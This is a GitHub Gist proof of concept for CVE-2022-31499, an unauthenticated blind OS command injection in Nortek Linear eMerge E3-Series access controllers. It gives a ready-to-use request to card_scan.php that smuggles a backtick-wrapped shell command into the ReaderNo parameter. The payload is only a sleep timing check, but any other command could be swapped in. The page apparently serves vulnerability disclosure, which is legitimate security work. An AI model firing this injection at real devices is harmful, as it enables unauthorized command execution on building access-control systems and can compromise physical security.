Skip to content

Instantly share code, notes, and snippets.

@omarhashem123
Created August 7, 2022 19:33
Embed
What would you like to do?
CVE-2022-31499 PoC
# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection
# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31499
# POC:
====================
http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep 20`&CardFormatNo=1337
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment